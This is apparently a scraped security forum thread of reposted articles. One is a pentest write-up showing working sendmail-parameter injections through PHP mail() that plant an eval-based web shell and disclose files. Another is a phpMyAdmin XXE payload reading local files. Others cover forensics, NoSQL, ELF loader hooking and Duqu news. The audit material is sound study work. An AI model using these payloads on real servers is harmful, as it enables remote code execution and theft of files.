== 5)) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE"); RETURN_FALSE; } if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sss|ss", &to, &to_len, &subject, &subject_len, &message, &message_len,&headers, &headers_len, &extra_cmd, &extra_cmd_len) == FAILURE ) { return; } As you can see the safe_mode implementation is not centralised: for each function concerned by this directive, the developpers must consider all safe_mode directives and ensure that they are properly applied, otherwise you can bypass that protection. That is one of the many reasons why this directive is now turned off by default. In the case of mail, the use of the fifth parameter is restricted when the safe_mode is enabled, that is why the number of arguments passed to the function is checked. Then the zend_parse_parameters function is called and extra_cmd is set with the fifth parameter. if (force_extra_parameters) { extra_cmd = php_escape_shell_cmd(force_extra_parameters); } else if (extra_cmd) { extra_cmd = php_escape_shell_cmd(extra_cmd); } if (php_mail(to_r, subject_r, message, headers, extra_cmd TSRMLS_CC)) { RETVAL_TRUE; The variable extra_cmd is then passed to php_escape_shell_cmd which escapes special characters that can be used to execute other commands. Finally the php_mail function is called. /* {{{ php_mail */ PHPAPI int php_mail(char *to, char *subject, char *message, char *headers, char *extra_cmd TSRMLS_DC) { ... snip ... FILE *sendmail; int ret; char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL; char *mail_log = INI_STR("mail.log"); char *hdr = headers; ... snip ... if (extra_cmd != NULL) { spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd); } else { sendmail_cmd = sendmail_path; } ... snip ... sendmail = popen(sendmail_cmd, "w"); PHP then retrieves the value of the sendmail_path directive and uses spprintf to create the command line sendmail_cmd, which is then passed to popen. Let's take an example to see how the final command will be like: (gdb) file php Reading symbols from /opt/php-5.3.0/sapi/cli/php...done. (gdb) set args -r 'mail("a@b.com", "s", "m", "", "-arg val");' (gdb) b mail.c:291 Breakpoint 1 at 0x83f39b2: file /opt/php-5.3.0/ext/standard/mail.c, line 291. (gdb) r Starting program: /opt/php-5.3.0/sapi/cli/php -r 'mail("a@b.com", "s", "m", "", "-arg val");' [Thread debugging using libthread_db enabled] Breakpoint 1, php_mail (to=0x8b5c2b8 "a@b.com", subject=0x8b5c2ec "s", message=0x8b5be2c "m", headers=0x8b5be9c "", extra_cmd=0x8b5c31c "-arg val") at /opt/php-5.3.0/ext/standard/mail.c:291 291 sendmail = popen(sendmail_cmd, "w"); (gdb) p sendmail_path $1 = 0x89af284 "/usr/sbin/sendmail -t -i " (gdb) p sendmail_cmd $2 = 0x8b5c35c "/usr/sbin/sendmail -t -i -arg val" Now that we have a great understanding of how mail works we can focus on the exploitation step. The sendmail program provides several parameters and options which are well documented in this document. Exploiting sendmail is a known subject but the context we are facing is really different from what actually exists: we can only pass parameters escaped with php_escape_shell_cmd to it. Code execution The main idea to implement this type of attack was to send a special string which contains PHP code into the SMTP message, and use sendmail features to log the message in a file with a php extension. This includes that we must have write rights to create/modify the targeted file. After some research we saw that the -X parameter could be used to log the traffic between the client and the MTA: this is exactly what we are looking for. In order to see which parameters can be used to inject PHP code in the log file, we tested each of them: # PHPFROM="<?php CLI; ?>" # SUBJECT="<?php SUBJECT; ?>" # MESSAGE="<?php BODY; ?>" # HEADERS="<?php HEADER; ?>" # PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php" # php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');" Parameters passed to sendmail will bypass the restrictions imposed by open_basedir because this directive only checks paths used in a PHP context. The content of the created file was the following: 03785 <<< To: a@b.c 03785 <<< Subject: <?php SUBJECT; ?> 03785 <<< X-PHP-Originating-Script: 1000:Command line code 03785 <<< <?php HEADER; ?> 03785 <<< 03785 <<< <?php BODY; ?> 03785 <<< [EOF] 03785 === CONNECT [127.0.0.1] 03785 <<< 220 self.com ESMTP Sendmail 8.14.4/8.14.4/Debian-2ubuntu1;... 03785 >>> EHLO self.com 03785 <<< 250-self.com Hello localhost [127.0.0.1], pleased to meet you 03785 <<< 250-ENHANCEDSTATUSCODES 03785 <<< 250-PIPELINING 03785 <<< 250-EXPN 03785 <<< 250-VERB 03785 <<< 250-8BITMIME 03785 <<< 250-SIZE 03785 <<< 250-DSN 03785 <<< 250-ETRN 03785 <<< 250-AUTH DIGEST-MD5 CRAM-MD5 03785 <<< 250-DELIVERBY 03785 <<< 250 HELP 03785 >>> MAIL From:<\<\?php.CLI\;.\?\>@self.com> SIZE=119 03785 <<< 250 2.1.0 <\<\?php.CLI\;.\?\>@self.com>... Sender ok 03785 >>> RCPT To:<a@b.c> 03785 >>> DATA 03785 <<< 250 2.1.5 <a@b.c>... Recipient ok 03785 <<< 354 Enter mail, end with "." on a line by itself 03785 >>> Received: (from yup@localhost) 03785 >>> by self.com (8.14.4/8.14.4/Submit) id p9S9C8p1003785; 03785 >>> Fri, 28 Oct 2011 11:12:08 +0200 03785 >>> Date: Fri, 28 Oct 2011 11:12:08 +0200 03785 >>> From: \<\?php.CLI\;.\?\>@self.com 03785 >>> Message-Id: <201110280912.p9S9C8p1003785@self.com> 03785 >>> X-Authentication-Warning: self.com: yup set sender to \<\?php CLI\; \?\> using -f 03785 >>> X-Authentication-Warning: self.com: Processed from queue /tmp 03785 >>> To: a@b.c 03785 >>> Subject: <?php SUBJECT; ?> 03785 >>> X-PHP-Originating-Script: 1000:Command line code 03785 >>> 03785 >>> <?php HEADER; ?> 03785 >>> As you can see there is no problem if we control the subject, the message or the headers: the PHP code stored in the file back.php will get executed. But this would add a condition: we should control the fifth parameter and another one. That is the case of the application we audit, but we want to search for a way to exploit it even if we only control the last parameter. The fifth parameter is escaped and will not result in PHP code execution, but we found a way to bypass that by putting the character @ into the from (-f) parameter passed to sendmail: # PHPFROM="<?php CLI;/*@*/ ?>" # SUBJECT=;MESSAGE=;HEADERS=; # PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php" # php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');" Which results in: 06532 >>> MAIL From:<\<\?php.CLI\;/\*@\*/\?\>> SIZE=72 06532 <<< 250 2.1.0 <\<\?php.CLI\;/\*@\*/\?\>>... Sender ok 06532 >>> RCPT To:<a@b.c> 06532 >>> DATA 06532 <<< 553 5.1.8 <a@b.c>... Domain of sender address <?php.CLI;/*@*/?> does not exist When we put the character @, sendmail tries to resolve the domain */?>.com by making up a DNS query. Because the domain doesn't exist it outputs an error with the email of the sender formatted: spaces are replaced by dots and magic happens: the character \ is removed. The effects of php_escape_shell_cmd are now removed but we must still find a way to execute PHP code without entering whitespaces. To do so we checked how the Zend Engine handles the PHP open tags and decide whether or not to execute the code. It uses Lex rules situated in Zend/zend_language_scanner.l: WHITESPACE [ \n\r\t]+ NEWLINE ("\r"|"\n"|"\r\n") ... snip ... <INITIAL>"<script"{WHITESPACE}+"language"{WHITESPACE}*"="{WHITESPACE}*("php"|"\"php\""|"'php'"){WHITESPACE}*">" { ... snip ... <INITIAL>"<%=" { if (CG(asp_tags)) { ... snip ... <INITIAL>"<?=" { if (CG(short_tags)) { ... snip ... <INITIAL>"<%" { if (CG(asp_tags)) { ... snip ... <INITIAL>"<?php"([ \t]|{NEWLINE}) { ... snip ... <INITIAL>"<?" { if (CG(short_tags)) { Looking at this code we can conclude that the only open tags which doesn't require whitespaces are short tags, which are enabled by default, and asp tags. # PHPFROM="<?if(isset(\$_SERVER[HTTP_SHELL]))eval(\$_SERVER[HTTP_SHELL]);/*@*/?>" # SUBJECT=;MESSAGE=;HEADERS=; # PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php" # php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');" Using these commands, we now have a remote code execution on the application: 08744 <<< 553 5.1.8 <a@b.c>... Domain of sender address <?if(isset($_SERVER[HTTP_SHELL]))eval($_SERVER[HTTP_SHELL]);/*@*/?> does not exist At the end of the audit we also found another way to exploit it even if short_open_tag is turned off: it was found that sendmail replaces the \n character to a space, so we can use the standard open tags. File disclosure The -C parameter permits to use an alternate configuration file. Using this parameter with an invalid configuration file will cause sendmail to output an error for each line it doesn't understand. This can be used to display the content of a targeted file. # SUBJECT=;MESSAGE=;HEADERS=; # PARAMS="-C/var/www/phpinfo.php -OQueueDirectory=/tmp -X/var/www/uploads/f.txt" # php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');" These commands are used to write the content of the file phpinfo.php to f.txt: 04151 >>> /var/www/phpinfo.php: line 1: unknown configuration line "<?php" 04151 >>> /var/www/phpinfo.php: line 3: unknown configuration line "phpinfo();" 04151 >>> /var/www/phpinfo.php: line 5: unknown configuration line "?>" 04151 >>> No local mailer defined Note also that if you are having troubles with the method explained previously to obtain remote code execution, you can use this parameter: if you can inject PHP code in a file situated on the webserver (eg: session files, apache logs, etc.), you can then write its content into a php file and execute it. Conclusion In this audit, the vulnerability was only caused of one missing character, which lead us to remote code execution. Entering in PHP internals helped us to see the protections applied, to have a great understanding of how mail was handled and later, thanks to the Lex rules, to know how to bypass the condition about spaces. In the exploitation part we also showed how to circumvent the conditions added by php_escape_shell_cmd and short_open_tag. Finally, the most important things to keep in mind are the methodology, the tests and the research we did, not the final exploitation itself. Sursa: Using mail() for Remote Code Execution | Sogeti ESEC Pentest A se vedea si link-urile din articol.
  12. Interesant: Const ady = "@targuOCna@" Private Shared Function beleste(ByVal bas As String, ByVal sadsa As Long) As String() Dim carnatzel As Long = Math.Ceiling(bas.Length / sadsa) Dim piula(carnatzel - 1) As String Dim MAMAIE As Long = 0 Dim pompeaza = IO.File.OpenWrite(dialog2.FileName) Dim marishor = pompeaza.Seek(0, IO.SeekOrigin.[End])
  13. Registry Decoder Digital Forensics Software Digital forensics deals with the analysis of artifacts on all types of digital devices. One of the most prevalent analysis techniques performed is that of the registry hives contained in Microsoft Windows operating systems. Registry Decoder was developed with the purpose of providing a single tool for the acquisition, analysis, and reporting of registry contents. To learn the history of this project, please see the history page. Registry Decoder is a free and open source tool. The online acquisition component can be accessed at: regdecoderlive - Automated, live acquisition of registry files - Google Project Hosting and the offline analysis component accessed at: registrydecoder - Automated Acquisition, Analysis, and Reporting of Registry Contents - Google Project Hosting. All functionality contained within the two components is exposed to a graphical user interface, and the tool aims to provide even novice investigators with powerful analysis capabilities. Another goal of Registry Decoder is to become the project in which all future registry-related research is performed in and developed for. If you are a researcher and interested in open problems within forensics registry research or are interested in contributing the project, please see our research page here. To follow the latest developments of Registry Decoder please follow our Twitter account @dfsforensics. Live: regdecoderlive - Automated, live acquisition of registry files - Google Project Hosting Offline: registrydecoder - Automated Acquisition, Analysis, and Reporting of Registry Contents - Google Project Hosting Sursa: Registry Decoder Digital Forensics Software | Registry Decoder
  14. Using NoSQL and analyzing big data Learn how to handle massive amounts of distributed data with schemaless datastores Date: 07 Oct 2011 (Published 19 May 2011) |Level: Introductory 1. Getting started with NoSQL NoSQL datastores are moving to the forefront because they solve the problem of scalability on a massive scale. Schemaless datastores are fundamentally different from traditional relational databases, but leveraging them is easier than you might think. Read: Java development 2.0: NoSQLItem marked not complete - Click to mark complete 2. Hands-on introduction to popular NoSQL datastores Now that you have the basics of NoSQL down, it's time to explore some of the more popular datastores. Get a hands-on introduction to MongoDB, CouchDB, and Amazon's SimpleDB, as well as Google AppEngine's multiple storage options. Read: MongoDB: A NoSQL datastore with (all the right) RDBMS movesItem marked not complete - Click to mark complete Listen: Eliot Horowitz on MongoDBItem marked not complete - Click to mark complete Watch: MongoDB video demoItem marked not complete - Click to mark complete Read: Cloud storage with Amazon's SimpleDB (two-part article)Item marked not complete - Click to mark complete Watch: Video demo: An introduction to Amazon SimpleDBItem marked not complete - Click to mark complete Read: REST up with CouchDB and Groovy's RESTClientItem marked not complete - Click to mark complete Listen: Aaron Miller and Nitin Borwankar on CouchDB and the CouchOne mobile platformItem marked not complete - Click to mark complete Read: GAE storage with Bigtable, Blobstore, and Google StorageItem marked not complete - Click to mark complete 3. Analyzing distributed data with MapReduce A key enabling technology of the big data revolution is MapReduce: a programming model and implementation developed by Google for processing massive-scale, distributed data sets. Explore Apache Hadoop, an open source MapReduce implementation that plays a major role in IBM's approach to big data analysis. Read: Big data analysis with Hadoop MapReduceItem marked not complete - Click to mark complete Read: Solve cloud-related big data problems with MapReduceItem marked not complete - Click to mark complete Read: Crunch your existing data using Apache HadoopItem marked not complete - Click to mark complete Download: IBM MapReduce Tools for EclipseItem marked not complete - Click to mark complete Read: A conversation with Rod Smith, IBM's Mr. Big DataItem marked not complete - Click to mark complete Sursa si link-urile necesare: http://www.ibm.com/developerworks/training/kp/j-kp-nosql/index.html
  15. Cheat Sheets for Developers Download Design Patterns 82,612 Architecture 2 Download Getting Started with Ajax 60,086 HTMLJavaScriptWeb Services/Servers 4 Download Spring Configuration 58,094 JavaXML 19 Download Core CSS: Part I 50,686 CSS 7 Download jQuery Selectors 48,883 CSSJavaScript 3 Download Getting Started with Eclipse 47,317 ALMEclipseIDE 61 Download Core Java Concurrency 45,542 AlgorithmsJava 5 Download Windows PowerShell 44,407 .NETWindows 24 Download Core Java 44,017 AlgorithmsJavaStandards 25 Download Core CSS: Part II 41,356 CSS 34 Download Core CSS: Part III 37,265 CSS 29 Download Essential MySQL 35,626 DatabaseOpen Source 50 Download Scrum 35,927 Agile/Methodologies 64 Download Core HTML 35,500 HTML 55 Download Apache Maven 2 32,482 ALMJavaOpen Source 6 Download Dependency Injection in EJB 3 31,583 JavaStandardsXML 26 Download Spring Annotations 31,348 Java 35 Download Using XML in Java 31,625 JavaXML 94 Download Getting Started with Git 31,274 ALMOpen Source 112 Download Getting Started with UML 31,856 ALMArchitectureOpen Source 21 Download JavaServer Faces 30,901 Design/UXJavaStandardsXML 28 Download JUnit and EasyMock 30,924 ALMJava 95 Download Getting Started with Java GUI Development 30,238 Design/UXJava 22 Download Getting Started with JPA 29,795 DatabaseJavaStandards 76 Download Getting Started with Domain-Driven Design 29,801 Agile/MethodologiesArchitecture 123 Download HTML5: New Standards for Web Interactivity 29,402 HTMLStandards 23 Download PHP 28,899 AlgorithmsDatabasePHP 16 Download C# 27,585 .NETC# 38 Download SOA Patterns 26,860 ArchitectureSOAWeb Services/Servers 58 Download JavaServer Faces 2.0 26,694 JavaStandards 15 Download Groovy 25,767 GroovyJava 79 Download Google App Engine for Java 25,913 CloudJava 82 Download Getting Started with Cloud Computing 24,409 Cloud 84 Download Continuous Integration: Patterns and Anti-patterns 24,059 ALM 20 Download Struts2 23,080 Design/UXJavaOpen Source 129 Download REST: Foundations of RESTful Architecture 23,852 StandardsWeb Services/Servers 17 Download Very First Steps in Flex 22,086 Flex/ActionScriptJavaWeb Services/Servers 32 Download Getting Started with Hibernate Search 22,109 DatabaseJavaSearch 101 Download JDBC Best Practices 22,929 ArchitectureDatabaseJavaStandards 1 Download GWT Style, Configuration and JSNI Reference 21,414 JavaJavaScript 18 Download Core .NET 21,312 .NETC# 33 Download Essential JSP Expression Language 21,500 JavaStandards 130 Download Designing Quality Software: Architectural and Technical Best Practices 21,461 Architecture 30 Download Essential Ruby 19,025 Ruby 43 Download Scalability & High Availability 19,441 ArchitectureBig DataDatabase 98 Download Getting Started with Maven Repository Management 19,150 ALMJava 108 Download Getting Started with Firebug 1.5 19,754 ALMCSSHTMLJavaScript 13 Download RSS and Atom 18,303 Content ManagementWeb Services/Servers 74 Download Agile Adoption: Improving Software Quality 18,989 Agile/MethodologiesArchitecture 83 Download Contexts and Dependency Injection for the Java EE Platform 18,344 JavaStandards 99 Download Getting Started with Java EE Security 18,783 JavaSecurityStandards 105 Download Getting Started with NoSQL and Data Scalability 18,357 Big DataDatabaseNoSQL 44 Download JBoss RichFaces 17,261 JavaStandardsXML 54 Download Agile Adoption: Reducing Cost 17,076 Agile/Methodologies 86 Download Spring Web Flow 17,374 Design/UXE-CommerceIDEJava 104 Download Getting Started with Apache Ant 17,771 ALMJavaOpen SourceXML 109 Download Getting Started with Kanban for Software Development 17,717 Agile/Methodologies 110 Download Objective-C for the iPhone and iPad 17,954 C/C++iOS 119 Download Getting Started with Application Lifecycle Management 17,140 ALM 145 Download Continuous Delivery: Patterns and Antipatterns in the Software Lifecycle 17,772 Agile/MethodologiesALMDevOps 14 Download NetBeans IDE 7: Programming in Java 7 17,282 IDEJavaNetBeans 56 Download Getting Started with JavaFX 16,950 Java 71 Download Essential PostgreSQL 16,339 DatabaseOpen Source 87 Download Continuous Integration: Servers and Tools 16,111 ALMOpen Source 128 Download What's New in JPA 2.0 16,862 DatabaseJavaStandards 45 Download Agile Adoption: Decreasing Time to Market 15,382 Agile/MethodologiesALM 46 Download Core ASP.NET 15,284 .NETC# 51 Download Effective Process Modeling with BPM & BPMN 15,490 Agile/MethodologiesOther Languages 57 Download Getting Started with Spring-DM 15,898 ArchitectureJava 60 Download Getting Started with Grails 15,343 Groovy 67 Download Getting Started with Selenium 15,888 ALMJavaScriptOpen Source 78 Download Getting Started with Virtualization 15,668 .NETVirtualization 93 Download Getting Started with Lean Software Development 15,923 Agile/Methodologies 118 Download Getting Started with Visual Studio 2010 15,805 .NETC#IDE 139 Download Spring Roo: Making Java Fun Again 15,179 IDEJava 150 Download Java Enterprise Edition 6: The Most Elegant Enterprise Java yet 15,671 Java 10 Download Silverlight 2 14,599 .NETC#Design/UX 27 Download Getting Started with MyEclipse 14,067 EclipseIDEJava 31 Download Core Seam 14,386 JavaSecurityXML 62 Download Getting Started with Eclipse RCP 14,791 EclipseIDE 97 Download Getting Started with JBoss Enterprise Application Platform 5 14,503 ALMJavaStandards 114 Download Application Prototyping with SketchFlow 14,961 .NETALMDesign/UX 117 Download Getting Started with Apache Hadoop 14,139 ArchitectureBig DataDatabaseOpen Source 120 Download Apache Solr: Getting Optimal Search Results 14,677 AlgorithmsSearchWeb Services/ServersXML 37 Download Getting Started with Equinox and OSGi 13,119 ArchitectureEclipseJava 48 Download Flex & Spring Integration 13,772 Flex/ActionScriptJavaXML 59 Download Getting Started with Drupal 13,480 Content ManagementPHP 63 Download Getting Started with Apache Wicket 13,181 Design/UXJavaOpen Source 70 Download Eclipse Plug-in Development 13,575 Eclipse 111 Download Getting Started with Windows Communication Foundation 4.0 13,369 .NETWeb Services/Servers 69 Download Getting Started with ASP.NET MVC 1.0 12,572 .NET 72 Download Getting Started with Windows Presentation Foundation 12,919 .NETDesign/UX 12 Download Getting Started with GlassFish Application Server v3 12,794 JavaStandardsWeb Services/Servers 102 Download Flex 4 and Spring 3 Integration 12,227 Flex/ActionScriptJavaWeb Services/ServersXML 147 Download Eclipse Tools for Spring: The SpringSource Tool Suite 12,496 EclipseIDEJava 9 Download Flexible Rails: Flex 3 on Rails 2 11,347 Flex/ActionScriptRuby 11 Download IntelliJ IDEA 11,975 ALMIDE 41 Download SOA Governance 11,531 SOA 42 Download Seam UI 11,890 Design/UXJavaStandards 49 Download Getting Started with BIRT 11,792 ALMBusiness Intelligence/ReportingEclipseJava 81 Download Essential F# 11,384 .NETOther Languages 106 Download Expression-Based Authorization with Spring Security 3 11,852 JavaSecurityXML 125 Download Selenium 2.0: Using the WebDriver API to Create Robust User Acceptance Tests 11,371 ALMJavaScriptOpen Source 135 Download The MVVM Design Pattern: A Formula for Elegant, Maintainable Mobile Apps 11,540 .NETArchitectureWindows Phone 141 Download Node.js: Building for Scalability with Server-Side JavaScript 11,865 JavaScriptOpen Source 85 Download Vaadin: A Familiar Way to Build Web Apps with Java 11,069 Design/UXJavaJavaScript 39 Download Essential EMF 10,973 ArchitectureEclipseJavaOther LanguagesXML 77 Download Core WS-BPEL: Business Process Execution Language 10,261 Agile/MethodologiesOther LanguagesStandards 92 Download Getting Started with Silverlight and Expression Blend 10,955 .NETC#Design/UXIDE 126 Download Liferay Essentials: A Definitive Guide for Enterprise Portal Development 10,699 Content ManagementDesign/UXJava 137 Download Understanding Lucene: Powering Better Search Results 10,658 AlgorithmsJavaSearchXML 138 Download RichFaces 4.0: A Next Generation JSF Framework 10,923 JavaStandardsXML 144 Download EclipseLink JPA: An Advanced ORM Persistence Framework 10,290 DatabaseEclipseJava 36 Download Core Mule 9,386 ArchitectureOpen SourceSOA 89 Download Getting Started with the Zend Framework 9,917 IDEOpen SourcePHP 100 Download Getting Started with Fitnesse 9,461 ALM 122 Download Functional Programming with Clojure: Simple Concurrency on the JVM 9,135 ClojureJava 80 Download NetBeans Platform 7.0: A Framework for Building Pluggable Enterprise Applications 9,722 IDEJava 140 Download Mule 3: Simplifying SOA 9,050 Open SourceSOAWeb Services/Servers 40 Download Apache Tapestry 5.0 8,650 Design/UXJavaStandards 68 Download Getting Started with Oracle Berkeley DB 8,074 DatabaseNoSQL 75 Download Getting Started with BlazeDS 8,505 Flex/ActionScriptJavaWeb Services/Servers 131 Download ADO.NET Entity Framework: Object-Relational Mapping and Data Access 8,699 .NETDatabaseIDE 65 Download ServiceMix 4.2: The Apache Open Source ESB 8,112 ArchitectureOpen SourceSOAWeb Services/Servers 133 Download Apache Hadoop Deployment: A Blueprint for Reliable Distributed Computing 8,913 AlgorithmsArchitectureBig DataDatabaseOpen Source 136 Download WebMatrix: Advanced Web Development Made Simple 8,899 .NETContent ManagementE-CommercePHPWindows 146 Download Flex Mobile Development: Build Apps for Android, iOS, and BlackBerry Tablet OS 8,817 AndroidFlex/ActionScriptIDEiOS 52 Download IntelliJ IDEA: Updated for 8.1 7,294 IDE 91 Download Getting Started with Adobe Flash Builder 4 7,140 Flex/ActionScriptIDE 96 Download Getting Started with PHP and Flex 7,340 Flex/ActionScriptPHP 124 Download PHPUnit: PHP Test-Driven Development - Automated Tools to Improve Your PHP Code Quality 7,894 ALMPHP 134 Download Cloud Computing with Windows Azure Platform 7,252 .NETCloudWindows 47 Download The Top Twelve Integration Patterns for Apache Camel 7,503 ArchitectureJavaXML 148 Download Mastering Portal UI Development With Vaadin and Liferay 7,034 Content ManagementDesign/UXJava 53 Download Getting Started with db4o: Persisting .NET Object Data 6,762 .NETDatabase 66 Download Getting Started with ColdFusion 9 6,984 ColdFusion 73 Download Getting Started with LiveCycle Data Services ES 6,620 DatabaseE-CommerceFlex/ActionScriptJava 107 Download Getting Started with Griffon 6,922 GroovyOpen Source 115 Download Getting Started with Infinispan 6,237 DatabaseJavaNoSQLOpen SourceXML 121 Download Open Source Media Framework: Building Simple Custom Video Players 6,869 Design/UXFlex/ActionScriptVideo/Animation 127 Download Developing a Silverlight Application for Windows Phone 7 6,107 .NETWindows Phone 132 Download Mastering Portals with a Portlet Bridge 6,204 ArchitectureContent ManagementDesign/UXJavaStandards 142 Download Adobe Flash Builder 4.5: Develop for Web, Desktop and Mobile 6,892 Flex/ActionScriptIDE 149 Download Chef: An Open Source Tool for Scalable Cloud and Data Center Automation 6,214 CloudData CenterDevOpsRuby 88 Download Getting Started with Caucho Resin 4,520 JavaStandardsWeb Services/Servers 113 Download Getting Started with Adobe Flash Catalyst 4,379 Design/UXFlex/ActionScript 90 Download Getting Started with Adobe ColdFusion Builder 3,204 ColdFusionIDE 103 Download Leveraging ColdFusion 9 Exposed Services from Java 3,128 ColdFusionJavaWeb Services/Servers 116 Download Adobe ColdFusion Web Services for PHP Programmers 3,478 ColdFusionPHPWeb Services/Servers 143 Download ColdFusion Builder 2: Faster Coding, Less Errors 2,483 ColdFusionIDE Link: http://refcardz.dzone.com/
  16. Sponsori? Bem moca?
  17. phpMyAdmin Arbitrary File Read phpMyAdmin suffers from a remote arbitrary file reading vulnerability when using a simplexml_load_string function meant to read xml from user input. Hi 80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string function to read xml from user input,this may be exploied to read files from the server or network in libraries/import/xml.php,some code like this /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need to * alter the code in any way. It's basically a freebee. */ $xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT); unset($buffer); /** * The XML was malformed */ if ($xml === FALSE) { so you just need to make a xml like this <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE wooyun [ <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini"> ]> <pma_xml_export version="1.0" xmlns:pma=" http://www.phpmyadmin.net/some_doc_url/"> <!-- - Structure schemas --> <pma:structure_schemas> <pma:database name="test" collation="utf8_general_ci" charset="utf8"> <pma:table name="ts_ad"> &hi80sec; </pma:table> </pma:database> </pma:structure_schemas> <!-- -
  18. How to recompile software with hardware optimizations Ovidiu / 02/11/2011 I don’t like to recompile software. I also laugh my ass off when some Gentoo “god” tells me how much faster their system became after they tweaked their compile flags. But (because there’s always a “but”) once in a while I do compile software. And in some of those cases, I really want the best optimization possible. One of these cases was when I wanted to run a CPU miner for Litecoin on my i7. I wanted to squeeze the most out the CPU, so I turned to the Gentoo wiki, where I found this page (seems down when I wrote this). You can find out the hardware flags for GCC running this simple commannd: $ echo "" | gcc -march=native -v -E - 2>&1 | grep cc1 The result looks something like this: /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.5.2/cc1 -E -quiet -v - -D_FORTIFY_SOURCE=2 [COLOR="Blue"]-march=core2 -mcx16 -msahf -mpopcnt -msse4.2 --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=6144 -mtune=core2[/COLOR] -fstack-protector The part in blue is the interesting part and it should be used as part of the CFLAGS. Adding a -O3 there can’t hurt, either: $ CFLAGS="-O3 -Wall <blue-string-from-above>" ./configure A ‘make’ will then build whatever program you’re compiling with the best optimizations for your hardware. I hope it’s useful! Enjoy! Autor: Ovidiu Sursa: http://blog.mybox.ro/2011/11/02/how-to-recompile-software-with-hardware-optimizations/
  19. ld-linux.so ELF hooker Stephane and myself are releasing a new tool injecting code at runtime, just between the ELF loader and target binary. It is an alternative to LD_PRELOAD, just a little bit more intrusive but 100% reliable Sources were released on Github: https://github.com/sduverger/ld-shatner When a binary is execve(), the kernel extracts from the ELF headers the interpreter to be launched, usually /lib/ld-linux.so.2. The kernel creates a new process and prepares the environment (arguments and auxiliary data). The target ELF entry point is set in auxiliary vector of type "ENTRY". Then the kernel opens the requested interpreter, maps the memory regions and start its execution at ld's ELF entry point. Then the loader analyzes the target ELF file, performs its loader work and sets EIP to target ELF entry point (extracted from auxv). At this point, main()'s program is eventually executed. Our goal was to permit the execution of code for abitrary dynamically linked binary without patching each of them. So our interest moved on the loader, the common point between most executables. Thus, we decided to patch a normal ld in order to inject code. My awesome colleague, Stephane Duverger (the ramooflax author!) and myself wrote ld-shatner. Its task is to patch ld-linux.so file accordingly: After ELF header, we shift "ELF program header" a few pages away In this new section, we inject a "loader routine" (hooked.s) and embedded code to be executed at runtime After having been saved in our section, ld's ELF entry point is overwritten to jump directly on our routine. This routine extracts from auxiliary vectors the target ELF entry point and overwrites it with a pointer to our embedded code (func() in the payload). Original ld's entry point is called and ld works as usual Eventually, it calls entry point set in auxiliary vector (which was replaced by a pointer to our payload) Embdded code runs It returns to our routine which finally jumps on original target entry point Some pictures before/after ld-shatner voodoo: Screenshot: http://i39.tinypic.com/vf8gli.png $ make clean all $ cp /lib/ld-linux.so.2 /bin/ls . $ ./ld-shatner ld-linux.so.2 obj.elf $ sudo cp ld-hook.so /lib/ $ ./interpatch ls $ ./ls ld-hook <---------------------- output of obj.elf [...] Ok, we cheat for the moment because we have to patch ls binary but we will not have to do that eventually) So what? My ultimate goal for ld-shatner is to use this method for starting applications in my sandbox project, seccomp-nurse. For the moment, I rely on LD_PRELOAD feature but this approach is... hackish and I have to work around some bugs because of this special context... Download: https://github.com/sduverger/ld-shatner Sursa: http://justanothergeek.chdir.org/2011/11/ld-linuxso-elf-hooker.html
  20. Windows Kernel Zero Day Vulnerability Found in Duqu Installer Posted by THN Reporter On 11/01/2011 08:17:00 AM Duqu malware attack exploited a zero-day vulnerability in the Windows kernel, according to security researchers tracking the Stuxnet-like cyber-surveillance Trojan. The vulnerability has since been reported to Microsoft and Microsoft is working on a fix for the kernel vulnerability right now. Researchers at the Laboratory of Cryptography and System Security (CrySyS) in Hungary confirmed the existence of the zero-day vulnerability and exploit in a brief note posted to its web site. Our lab, the Laboratory of Cryptography and System Security (CrySyS) pursued the analysis of the Duqu malware and as a result of our investigation, we identified a dropper file with an MS 0-day kernel exploit inside. We immediately provided competent organizations with the necessary information such that they can take appropriate steps for the protection of the users. The installer file is a Microsoft Word document (.doc) that exploits a previously unknown kernel vulnerability that allows code execution. We contacted Microsoft regarding the vulnerability and they're working diligently towards issuing a patch and advisory. When the file is opened, malicious code executes and installs the main Duqu binaries. The chart below explains how the exploit in the Word document file eventually leads to the installation of Duqu. Other security vendors have reported infections in the following countries: • Austria • Hungary • Indonesia • United Kingdom • Iran - infections different from those observed by Symantec. "Microsoft is collaborating with our partners to provide protections for a vulnerability used in targeted attempts to infect computers with the Duqu malware. We are working diligently to address this issue and will release a security update for customers through our security bulletin process", Jerry Bryant, group manager of response communications in Microsoft's Trustworthy Computing group said in a statement. You can find Symantec updated whitepaper (version 1.3) here. Key updates in the Symantec whitepaper include: • An unpatched zero-day vulnerability is exploited through a Microsoft Word document and installs Duqu • Attackers can spread Duqu to computers in secure zones and control them through a peer-to-peer C&C protocol • Six possible organizations in eight countries have confirmed infections • A new C&C server (77.241.93.160) hosted in Belgium was discovered and has been shut down. Symantec whitepaper: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf Sursa: http://thehackernews.com/2011/11/windows-kernel-zero-day-vulnerability.html
